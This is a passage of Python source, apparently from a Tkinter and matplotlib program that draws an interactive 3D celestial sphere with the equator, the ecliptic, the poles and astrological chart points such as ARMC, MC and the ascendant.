d_loc=\"{}-{}-{}\".format(self.data[\"d\"][2], self.data[\"d\"][1], self.data[\"d\"][0])\r\n t_loc=\"{: >2}:{:0>2}:{}\".format(self.data[\"t\"][0], self.data[\"t\"][1], self.data[\"t\"][2])\r\n time_loc = \"{: >10}, {: >8}\".format(d_loc, t_loc)\r\n time_loc= \"{: ^21}\".format(time_loc)\r\n name=\"\"\r\n self.id_text_name= self.ax.text2D(*self.txt_name, name, **self.prop_txt_name, transform=self.ax.transAxes)\r\n self.id_text_time= self.ax.text2D(*self.txt_time, time_loc, **self.prop_txt_time, transform=self.ax.transAxes)\r\n self.id_text_time2= self.ax.text2D(*self.txt_time2, time_utc, **self.prop_txt_time2, transform=self.ax.transAxes)\r\n\r\n #================\r\n\r\n self.plot_Equator_Ecliptic() \r\n self.draw_sphere()\r\n self.sphere_.set_visible(False) \r\n self.draw_surface()\r\n self.plot_meridian()\r\n \r\n self.planets_obj={}\r\n self.houses_obj={}\r\n self.zodiac_obj={}\r\n self.planets_ids={}\r\n self.houses_ids={}\r\n self.zodiac_ids={}\r\n self.plot_planets(self.planets_data)\r\n 
self.plot_zodiac()\r\n\r\n style_=(0, (1, 2))\r\n id_axes,=self.ax.plot(X,Y,Z ,color='#999999',linestyle = style_,label='Axes', alpha=alpha_main,picker=0)\r\n self.leg_items_ids.append(id_axes) ;self.axes_id=id_axes\r\n\r\n self.azim0=20\r\n self.elev0=15\r\n self.ax.view_init(elev = self.elev0, azim = self.azim0)\r\n\r\n \r\n col_=\"#900000\"\r\n self.annot = self.ax.annotate(\"click\", xy=(0,0), fontsize=9, c=col_, xytext=(-20,20),textcoords=\"offset points\",bbox=dict(boxstyle=\"round,pad=0.5\", fc=\"#FCFF90\", alpha = 0.7),arrowprops=dict(arrowstyle=\"->\"), zorder=20) #\"offset pixels\"\r\n self.annot.set_visible(False)\r\n\r\n self.click_tip_list=[\"North Pole\", \"South Pole\", \"Ecliptic North Pole\", \"Ecliptic South Pole\"]\r\n\r\n\r\n #========== Legend ========\r\n leg_colPM=\"#333333\"\r\n leg_colHor=color_hor\r\n leg_colPM=color_vert \r\n add_item0 = Line2D([0], [0], marker=\"o\", color=\"w\", label=\"Sphere\", markerfacecolor=\"#D0C7E8\", markersize=10,linewidth=10)\r\n add_item1 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Equator\", markerfacecolor=\"#700000\", markersize=10,linewidth=10)\r\n add_item2 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Ecliptic\", markerfacecolor=\"#A9A54B\", markersize=10)#\r\n add_item3 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Horizon\", markerfacecolor=leg_colHor, markersize=10)\r\n add_item4 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Prime Vertical\", markerfacecolor=leg_colPM, markersize=10)\r\n add_item5 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Meridian\",markerfacecolor=\"#333333\", markersize=10)#\r\n add_item6 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Proj. Horizons\",markerfacecolor=\"#2D305C\", markersize=10)\r\n add_item7 = Line2D([0], [0], marker=\"s\", color=\"w\", label=\"Parallels\",markerfacecolor=\"#333333\", markersize=10)\r\n add_item8 = Line2D([0], [0], marker=\"*\", color=\"w\", label=\"Extra off\",markerfacecolor='#543E17', markersize=10)#\r\n\r\n add_item9 = Line2D([0], [0], marker='o', color='#DCDCDC', label=\"Show half\",markerfacecolor='#333333', markersize=1,linestyle=\"dashed\")\r\n\r\n id_scale= Line2D([0], [0], marker='o', color='#DCDCDC', label=\"Scale\",markerfacecolor='#333333', markersize=1,linestyle=\"dashed\")\r\n #add_item24 = Line2D([0], [0], marker=\"o\", color=\"w\", label=\"Show grid\", markerfacecolor='#111111', markersize=10)\r\n\r\n self.leg_mer_circle=add_item5\r\n\r\n for id_ in [add_item0, add_item1, add_item2, add_item3, add_item4, add_item5,add_item8, add_item9,id_scale]:\r\n self.leg_items_ids.append(id_)\r\n\r\n leg_x=0.99;leg_y=0.99\r\n self.legend = self.fig.legend(handles=self.leg_items_ids,loc=\"upper right\",fancybox=True, shadow=True,borderpad=0.6,bbox_to_anchor=(leg_x, leg_y), prop=dict(size=10))\r\n\r\n for legline, line, text in zip(self.legend.get_lines(), self.leg_items_ids, self.legend.get_texts()):\r\n legline.set_picker(True)\r\n legline.set_pickradius(6)\r\n txt=text.get_text()\r\n self.leg_obj[legline] = (txt, line)\r\n\r\n\r\n #===============\r\n x001 = 0.92\r\n y001 = 0.58\r\n\r\n #Texts \"View:\"\r\n resize = 0.58\r\n f_size = 9\r\n f_col = \"#333\"\r\n b_col = \"#D3D3D3\"\r\n e_col = \"#999999\"\r\n b_col2 = \"#EEEEEE\"\r\n font_f = \"Courier New\" #\"Tahoma\"\r\n font_w = \"bold\"\r\n alpha_t = 0.9\r\n\r\n x00 = 0.916\r\n y00 = 0.58\r\n\r\n if size760==True:resize = 0.7; dd=0.93;x00=x00+0.1\r\n elif size900==True: resize = 0.625; dd=0.93;x00=x00+0.03\r\n\r\n x0 = x00; y0 = y00;dx = 0.0368; dx1 = 0.04 \r\n 
dx = resize * dx; x01= 0.009\r\n\r\n self.id_view=self.ax.text2D(x0, y0, \"View:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w, bbox = dict(boxstyle = \"round\", edgecolor = b_col2, facecolor = b_col2,pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes)\r\n self.id_E = self.ax.text2D(x0 + x01 + 2*dx, y0, \"E\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_W = self.ax.text2D(x0 + x01 + 3*dx, y0, \"W\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_N = self.ax.text2D(x0 + x01 + 4*dx, y0, \"N\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_S = self.ax.text2D(x0 + x01 + 5*dx, y0, \"S\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\", edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"center\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n #Texts \"Azim:\"\r\n x0 = x00 \r\n dy00 = 0.04\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00;\r\n dy = 0.035;\r\n dx = 0.0449 ; dx1 = 0.024\r\n dx = resize * dx\r\n dy = resize * dy\r\n\r\n self.id_azim=self.ax.text2D(x0, y0 , \"Azim:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w, bbox = dict(boxstyle = \"round\", edgecolor = b_col2, facecolor = b_col2, pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes) \r\n\r\n self.id_A0 = self.ax.text2D(x0 + dx1 + dx, y0 , \" 0\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_A90 = self.ax.text2D(x0 + dx1 + 2*dx, y0 , \"90\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_A180 = self.ax.text2D(x0 + dx1 + 3*dx, y0 , \"180\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n self.id_elev=self.ax.text2D(x0, y0 - dy, \"Elev:\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , bbox = dict(boxstyle = \"round\",edgecolor = b_col2, facecolor = b_col2,pad = 0.3), picker = 3, ha = \"left\", va = \"center\",alpha = 1, transform = self.ax.transAxes) \r\n\r\n self.id_E0 = self.ax.text2D(x0 + dx1 + dx, y0 - dy, \" 0\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n 
self.id_E90 = self.ax.text2D(x0 + dx1 + 2*dx, y0 - dy, \"90\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_E180 = self.ax.text2D(x0 + dx1 + 3*dx, y0 - dy, \"180\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n \r\n #Texts \"Init \"\r\n\r\n dy = 0.05; dx = 0.04\r\n x0 = x00\r\n dy00 = 0.07\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00 \r\n dy = 0.056; dx = 0.077\r\n dx = resize * dx\r\n dy = resize * dy\r\n\r\n self.id_v_start = self.ax.text2D(x0, y0 - dy, \"Init \", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_chart = self.ax.text2D(x0 + dx, y0 - dy, \"Chart\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_v_Eq = self.ax.text2D(x0 + 2*dx, y0 - dy, \"Equat\", c = f_col, size = f_size, fontfamily = font_f, fontweight = font_w , picker = 5,bbox = dict(boxstyle = \"round\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\", alpha = alpha_t, transform = self.ax.transAxes) \r\n\r\n x0 = x00; \r\n dx00 = 0.082\r\n dx00 = resize * dx00\r\n x0 = x0 + dx00\r\n dy00 = 0.15\r\n dy00 = resize * dy00\r\n y0 = y00 - dy00\r\n dx1 = 0.02; dx2=0.024\r\n dy1 = 0.08; dy2 = 0.14; dy3 = 0.11;\r\n dy1 = resize * dy1; dy2 = resize * dy2; dy3 = resize * dy3\r\n\r\n dx2=0.028;dx2b=0.024\r\n f_size2=7\r\n self.id_v_up = self.ax.text2D(x0 + resize * dx1, y0 - dy1, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"rarrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), rotation=90, ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_down = self.ax.text2D(x0 + resize * dx1, y0 - dy2, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"larrow\", edgecolor = e_col,facecolor = b_col,pad = 0.3), rotation=90, ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes) \r\n self.id_v_left = self.ax.text2D(x0 + resize * dx1 - resize * dx2, y0 - dy3, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"larrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n self.id_v_right = self.ax.text2D(x0 + resize * dx1 + resize * dx2b, y0 - dy3, \" \", c = f_col, size = f_size2, fontfamily = font_f, fontweight = font_w , picker = 5, bbox = dict(boxstyle = \"rarrow\",edgecolor = e_col,facecolor = b_col,pad = 0.3), ha = \"left\", va = \"center\",alpha = alpha_t, transform = self.ax.transAxes)\r\n\r\n\r\n self.id_v_anim=None\r\n self.id_v_prev=self.id_v_next=None\r\n self.id_v_test=None\r\n\r\n\r\n self.half=0\r\n self.view_East=[self.hor_circl_1, self.prime_vert_1, 
self.eq_circl_1, self.ecl_circl_1]\r\n self.view_West=[self.hor_circl_2, self.prime_vert_2, self.eq_circl_2, self.ecl_circl_2]\r\n\r\n self.circles_alpha()\r\n\r\n self.ax.set_axis_off() \r\n self.ax.axison=False\r\n\r\n self.ax.set_xlabel('x - axis'); self.ax.set_ylabel('y - axis'); self.ax.set_zlabel('z - axis')\r\n arr=[-1,0,1]\r\n self.ax.set_xticks(arr); self.ax.set_yticks(arr); self.ax.set_zticks(arr);\r\n\r\n self.xlim = self.ax.get_xlim()\r\n self.ylim = self.ax.get_ylim()\r\n self.zlim = self.ax.get_zlim()\r\n\r\n\r\n #============= Tkinter =============\r\n self.canvas = FigureCanvasTkAgg(self.fig, master = frame)\r\n self.canvas.draw() \r\n self.canvas.get_tk_widget().pack(side=TOP, anchor=NW, fill=BOTH, expand=True)\r\n\r\n self.canvas.mpl_connect('button_press_event', self.on_click)\r\n self.canvas.mpl_connect('pick_event', self.onpick) \r\n self.canvas.mpl_connect('key_release_event', self.key_)\r\n #self.canvas.mpl_connect('scroll_event', self.scroll_zoom)\r\n \r\n #=========== window size \r\n\r\n mins_x=1000;mins_y=700\r\n self.parent.minsize(mins_x,mins_y)\r\n w,h = self.fig.get_size_inches()*self.fig.dpi\r\n h = h + 100 #figure plus parent window\r\n w = w + 50\r\n window=self.parent\r\n screenHeight = window.winfo_screenheight()\r\n screenWidth = window.winfo_screenwidth()\r\n x = int(screenWidth/2 - w/2)\r\n y = int(screenHeight/2 - h/2)\r\n window.wm_geometry(\"+{}+{}\".format(x, y))\r\n window.resizable(False, False) \r\n\r\n def draw_axes(self): \r\n z4 = np.linspace(-1.01,1.01,50)\r\n y4 = np.zeros(np.size(z4))\r\n x4 = np.zeros(np.size(y4))\r\n\r\n x5 = np.linspace(-1.01,1.01,50)\r\n y5 = np.zeros(np.size(z4))\r\n z5 = np.zeros(np.size(y4))\r\n\r\n y6 = np.linspace(-1.01,1.01,50)\r\n x6 = np.zeros(np.size(z4))\r\n z6 = np.zeros(np.size(y4))\r\n\r\n #========joined data for legend - one item only to swicth off\r\n X=np.append(x4,np.NaN);X=np.append(X,x5) ;X=np.append(X,np.NaN); X=np.append(X,x6)\r\n Y=np.append(y4,np.NaN);Y=np.append(Y,y5) ;Y=np.append(Y,np.NaN); Y=np.append(Y,y6)\r\n Z=np.append(z4,np.NaN);Z=np.append(Z,z5) ;Z=np.append(Z,np.NaN); Z=np.append(Z,z6)\r\n\r\n return [X,Y,Z] \r\n\r\n def circles_alpha(self):\r\n if self.sw_cir_alpha==False:\r\n self.prime_vert_1.set_alpha(0.4)\r\n self.prime_vert_2.set_alpha(0.2)\r\n self.hor_circl_2.set_alpha(0.2) \r\n self.mer_circle.set_alpha(0.2)\r\n self.axes_id.set_alpha(0.2)\r\n\r\n for cir in [self.eq_circl_2, self.ecl_circl_2]:\r\n cir.set_alpha(0.2) \r\n\r\n for el in self.ecliptic_scale:\r\n self.ecliptic_scale[el][0].set_alpha(0.5) \r\n self.ecliptic_scale[el][1].set_alpha(0.5) \r\n for el in self.equator_scale:\r\n self.equator_scale[el][0].set_alpha(0.5) \r\n self.equator_scale[el][1].set_alpha(0.5)\r\n\r\n self.sw_cir_alpha=True\r\n\r\n elif self.sw_cir_alpha==True:\r\n self.prime_vert_1.set_alpha(self.alpha_main)\r\n self.prime_vert_2.set_alpha(self.alpha_main)\r\n self.hor_circl_2.set_alpha(self.alpha_main) \r\n self.mer_circle.set_alpha(self.alpha_main)\r\n self.axes_id.set_alpha(self.alpha_main)\r\n\r\n for cir in [self.eq_circl_1, self.ecl_circl_1]:\r\n cir.set_alpha(self.alpha_main_2)\r\n for cir in [self.eq_circl_2, self.ecl_circl_2]:\r\n cir.set_alpha(self.alpha_main_2) \r\n\r\n for el in self.ecliptic_scale:\r\n self.ecliptic_scale[el][0].set_alpha(self.alpha_main) \r\n self.ecliptic_scale[el][1].set_alpha(self.alpha_main) \r\n for el in self.equator_scale:\r\n self.equator_scale[el][0].set_alpha(self.alpha_main) \r\n self.equator_scale[el][1].set_alpha(self.alpha_main) \r\n\r\n 
self.sw_cir_alpha=False\r\n\r\n\r\n def plot_Equator_Ecliptic(self):\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0] \r\n ARMC=float(ARMC)\r\n ARMC=norm_(ARMC)\r\n self.ARMC=ARMC\r\n φ = self.ψ\r\n self.k = k = np.array([1, 0, 0])\r\n self.v = v = np.array([0, 1, 0])\r\n\r\n geo_latitude=self.geo_latitude\r\n s1 = \"S\" if self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n self.south = True if self.geo_latitude<0 else False\r\n\r\n alpha_main_2=0.8\r\n self.alpha_main_2=alpha_main_2\r\n \r\n #===== Celestial Equator\r\n \r\n self.geo_latitude = geo_latitude\r\n self.geo_lat = np.radians(self.geo_latitude)\r\n geo_lat = self.geo_lat\r\n\r\n rotation = np.pi/2 + geo_lat\r\n self.rotation=rotation\r\n self.eq_rot_ang=rotation\r\n\r\n v_rot = self.Rodrigues_rotation(v,k,rotation)\r\n self.equator_rot=v_rot\r\n\r\n x,y,z=self.equator_rot\r\n x2= np.sin(φ) + x * np.cos(φ)\r\n y2= y * np.cos(φ)\r\n z2= z * np.cos(φ)\r\n '''\r\n #==== solid\r\n id_,=self.ax.plot(x2,y2,z2 ,color=\"#700000\", linestyle = \"solid\" ,picker=2) #'dashed'\r\n #id_=id(id_)\r\n self.ids[id(id_)] =[[x2[18],y2[18],z2[18]],\"Celestial Equator\"] #\"v_rot+π/2\"\r\n self.eq_circl=id_\r\n '''\r\n color_equat=\"#700000\"\r\n id_1=id_2=0 \r\n\r\n φ_1 = np.linspace(0, np.pi, data_pts)\r\n x2, y2, z2 = self.circl_vect(self.equator_rot,k,φ_1)\r\n eq_1 = [x2[0],y2[0],z2[0]]\r\n self.eq_circl_1, = self.ax.plot(x2, y2, z2, color=color_equat, picker=main_circles_picker, linewidth=1, linestyle = \"solid\", alpha=self.alpha_main_2)\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, data_pts)\r\n x2b, y2b, z2b = self.circl_vect(self.equator_rot,k,φ_2)\r\n eq_2 = [x2b[0],y2b[0],z2b[0]]\r\n self.eq_circl_2, = self.ax.plot(x2b, y2b, z2b, color=color_equat, picker=main_circles_picker, linewidth=1, linestyle = \"dashed\", alpha=self.alpha_main_2)\r\n\r\n\r\n self.ids[id(self.eq_circl_1)] =[[x2[13],y2[13],z2[13]],\"Celestial Equator\"]\r\n self.ids[id(self.eq_circl_2)] =[self.ids[id(self.eq_circl_1)][0],\"Celestial Equator\"] \r\n\r\n self.equat_ids.append(self.eq_circl_1); self.equat_ids.append(self.eq_circl_2)\r\n\r\n #====== ARMC\r\n ARMC_= eq_1\r\n ARMC_= np.multiply(1.05,ARMC_)\r\n self.armc_id, = self.ax.plot(*ARMC_,c=\"#555555\",marker=\"$ARMC$\",markersize=12,picker=4) #point\r\n self.equat_ids.append(self.armc_id)\r\n self.ids[id(self.armc_id)] =[eq_1,\"ARMC\"]\r\n self.armc_id.set_visible(False)\r\n ARMC=np.radians(ARMC)\r\n self.v_equinox_ang=ARMC\r\n\r\n #------- 2nd point on rotated circle oblique\r\n self.v_equinox_ang=ARMC\r\n φ2=-ARMC\r\n x12, y12, z12 = self.circl_vect(self.equator_rot,k,φ2)\r\n self.v_equinox=[x12,y12,z12] # vernal equinox\r\n self.a_equinox=[-x12,-y12,-z12]\r\n self.equinox_id, = self.ax.plot(*self.v_equinox, c=\"#555\", marker=\"o\", markersize=2, zorder=3, alpha=1);\r\n self.ecl_ids.append(self.equinox_id)\r\n\r\n #====== poleN\r\n rot=self.rotation\r\n v_rot=self.equator_rot\r\n color_4=\"#444444\"\r\n rotation = self.eq_rot_ang + np.pi/2\r\n\r\n v_rot1 = self.Rodrigues_rotation(v,k,rotation)\r\n self.poleS=v_rot1\r\n v_rot2=-v_rot1\r\n self.poleN=v_rot2\r\n\r\n self.poleN_id, =self.ax.plot(*self.poleN,c=color_4,marker=\"$N$\",picker=5, zorder=2) #point\r\n self.ids[id(self.poleN_id)] =[self.poleN,\"North Pole\"] #\"v_rot-π/2\"\r\n self.equat_ids.append(self.poleN_id)\r\n\r\n self.poleS_id, =self.ax.plot(*self.poleS,c=color_4, 
marker=\"$S$\",picker=5, zorder=2) #point\r\n self.ids[id(self.poleS_id)] =[self.poleS,\"South Pole\"] #\"v_rot+π/2\"\r\n self.equat_ids.append(self.poleS_id)\r\n\r\n poleN_θ_hor=np.arccos(self.poleN[2])\r\n self.poleN_elev=np.degrees(poleN_θ_hor) \r\n \r\n\r\n #====== Ecliptic\r\n φ1 = -ARMC - np.pi/2\r\n x13, y13, z13 = self.circl_vect(self.equator_rot,k,φ1)\r\n self.v_rot4=[x13,y13,z13]\r\n\r\n #ε=23.43 \r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.v_rot4)\r\n ε=np.radians(self.ε)\r\n rotation = ε\r\n v_rot3 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.ecliptic_rot=v_rot3\r\n v2= -self.ecliptic_rot\r\n\r\n φ4=np.arctan(-k1[2]/v2[2])\r\n x3t= v2[0] * np.sin(φ4) + k1[0] * np.cos(φ4)\r\n if x3t<0:\r\n φ4 = φ4 + np.pi\r\n\r\n φ4=norm_r(φ4)\r\n self.asc_lon=φ4\r\n\r\n φ3 = np.arctan(-v2[0]/k1[0]) if k1[0] != 0 else np.pi/2\r\n\r\n if norm_r(ARMC)< np.pi:\r\n φ3=np.pi/2 - φ3\r\n ecl_st=0 + φ3 #ecl_start\r\n else:\r\n φ3= - np.pi/2 - φ3\r\n ecl_st=0 + φ3\r\n \r\n self.ecl_start=np.degrees(φ3)\r\n φ_1 = np.linspace(ecl_st , ecl_st + np.pi, data_pts)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_1)\r\n self.ecl_circl_1, = self.ax.plot(x3,y3,z3 ,color=color_ecl, picker=main_circles_picker, linestyle = \"solid\", alpha=alpha_main_2)\r\n self.ids[id(self.ecl_circl_1)] =[[x3[15],y3[15],z3[15]],\"Ecliptic\"]\r\n \r\n\r\n φ_2 = np.linspace(ecl_st + np.pi, ecl_st + 2*np.pi, data_pts)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_2)\r\n self.ecl_circl_2, = self.ax.plot(x3,y3,z3 ,color=color_ecl, picker=main_circles_picker, linestyle = \"dashed\", alpha=alpha_main_2)\r\n self.ids[id(self.ecl_circl_2)] =[self.ids[id(self.ecl_circl_1)][0],\"Ecliptic\"]\r\n \r\n r1=1.07\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ3, r1)\r\n self.v_MC=self.circl_vect(k1, v2, φ3)\r\n\r\n self.mc_id,= self.ax.plot(x3p,y3p,z3p,c=\"#444444\",marker=\"$MC$\",markersize=10,picker=4, zorder=2); #point\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3)\r\n lon_=f'Medium Coeli: lon={round(self.planets_data[\"MC\"][\"ecl\"][0],2)}°'\r\n self.ids[id(self.mc_id)] =[[x3, y3, z3],lon_]\r\n self.ecl_ids.append(self.mc_id)\r\n self.mc_id.set_visible(False)\r\n\r\n\r\n #====== Asc ========\r\n x13, y13, z13 = self.circl_vect(k1, v2, φ4)\r\n self.asc_id2, =self.ax.plot(x13,y13,z13, c=\"#333\", marker=\"o\", markersize=3, zorder=2, alpha=0.6);#point\r\n self.ecl_ids.append(self.asc_id2)\r\n asc=[x13,y13,z13]\r\n self.v_asc=asc\r\n\r\n r1=1.07\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ4, r1)\r\n asc_t=[x3p,y3p,z3p-0.03]\r\n self.asc_id,=self.ax.plot(*asc_t, c=\"#555555\",marker=\"$Asc$\",markersize=10,picker=5, zorder=2) ;#point\r\n\r\n self.asc_id2.set_visible(False)\r\n self.asc_id.set_visible(False)\r\n self.ecl_ids.append(self.asc_id)\r\n\r\n\r\n self.Asc_φ_hor=np.arccos(self.v_asc[0])\r\n if self.v_asc[1]<0: self.Asc_φ_hor = -abs(self.Asc_φ_hor)\r\n self.Asc_φ_hor = norm_r(self.Asc_φ_hor)\r\n\r\n\r\n '''\r\n #=== solid\r\n x3= k1[0] * np.sin(φ) + self.ecliptic_rot[0] * np.cos(φ)\r\n y3= k1[1] * np.sin(φ) + self.ecliptic_rot[1] * np.cos(φ)\r\n z3= k1[2] * np.sin(φ) + self.ecliptic_rot[2] * np.cos(φ)\r\n id_,=self.ax.plot(x3,y3,z3 ,color = color_ecl, linestyle = \"solid\" ,picker=2) #'dashed'\r\n self.ids[id(id_)] =[[x2[18],y2[18],z2[18]],\"Ecliptic\"] \r\n self.ecl_circle=id_\r\n '''\r\n\r\n #============= Ecliptic pole \r\n\r\n rotation = -np.pi/2\r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.ecliptic_rot)\r\n\r\n v_rot6 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.poleN_ecl = v_rot6\r\n self.poleN_ecl_id, 
=self.ax.plot(*self.poleN_ecl,c=color_ecl, marker=\"$n$\",markersize=5,picker=5, zorder=2, alpha=0.8)\r\n self.poleS_ecl=-self.poleN_ecl; \r\n self.poleS_ecl_id, =self.ax.plot(*self.poleS_ecl,c=color_ecl, marker=\"$s$\",markersize=5,picker=5, zorder=2, alpha=0.8)\r\n\r\n self.ids[id(self.poleN_ecl_id)] =[self.poleN_ecl,\"Ecliptic North Pole\"]\r\n self.ecl_ids.append(self.poleN_ecl_id)\r\n self.ids[id(self.poleS_ecl_id)] =[self.poleS_ecl,\"Ecliptic South Pole\"]\r\n self.ecl_ids.append(self.poleS_ecl_id)\r\n\r\n\r\n poleN_ecl_θ_hor=np.arccos(self.poleN_ecl[2])\r\n pole_ecl_elev= np.pi/2 - poleN_ecl_θ_hor\r\n self.pole_ecl_elev=np.degrees(pole_ecl_elev)\r\n\r\n self.plot_ecliptic_scale()\r\n self.plot_equator_scale()\r\n\r\n\r\n def plot_Equator_Ecliptic_next(self):\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0]\r\n ARMC=float(ARMC)\r\n ARMC=norm_(ARMC)\r\n self.ARMC=ARMC\r\n \r\n φ = self.ψ\r\n self.k = k = np.array([1, 0, 0])\r\n self.v = v = np.array([0, 1, 0])\r\n geo_latitude=self.geo_latitude\r\n\r\n s1 = \"S\" if self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n self.south = True if self.geo_latitude<0 else False\r\n \r\n #===== Celestial Equator\r\n \r\n self.geo_latitude = geo_latitude\r\n self.geo_lat = np.radians(self.geo_latitude)\r\n geo_lat = self.geo_lat\r\n\r\n rotation = np.pi/2 + geo_lat\r\n self.rotation=rotation\r\n self.eq_rot_ang=rotation\r\n\r\n v_rot = self.Rodrigues_rotation(v,k,rotation)\r\n self.equator_rot=v_rot\r\n\r\n x,y,z=self.equator_rot\r\n x2= np.sin(φ) + x * np.cos(φ)\r\n y2= y * np.cos(φ)\r\n z2= z * np.cos(φ)\r\n\r\n color_equat=\"#700000\"\r\n id_1=id_2=0 \r\n\r\n φ_1 = np.linspace(0, np.pi, 50)\r\n x2, y2, z2 = self.circl_vect(self.equator_rot,k,φ_1)\r\n eq_1 = [x2[0],y2[0],z2[0]]\r\n self.eq_circl_1.set_data_3d(x2, y2, z2)\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, 50)\r\n x2b, y2b, z2b = self.circl_vect(self.equator_rot,k,φ_2)\r\n eq_2 = [x2b[0],y2b[0],z2b[0]]\r\n \r\n self.eq_circl_2.set_data_3d(x2b, y2b, z2b)\r\n\r\n #====== ARMC\r\n ARMC_= eq_1\r\n ARMC_= np.multiply(1.05,ARMC_)\r\n self.armc_id.set_data_3d(*ARMC_)\r\n ARMC=np.radians(ARMC)\r\n self.v_equinox_ang=ARMC\r\n\r\n self.v_equinox_ang=ARMC\r\n φ2=-ARMC\r\n x12, y12, z12 = self.circl_vect(self.equator_rot,k,φ2)\r\n self.v_equinox=[x12,y12,z12]\r\n self.a_equinox=[-x12,-y12,-z12]\r\n self.equinox_id.set_data_3d(x12, y12, z12)\r\n\r\n #====== poleN\r\n rot=self.rotation\r\n v_rot=self.equator_rot\r\n color_4=\"#444444\"\r\n\r\n rotation = self.eq_rot_ang + 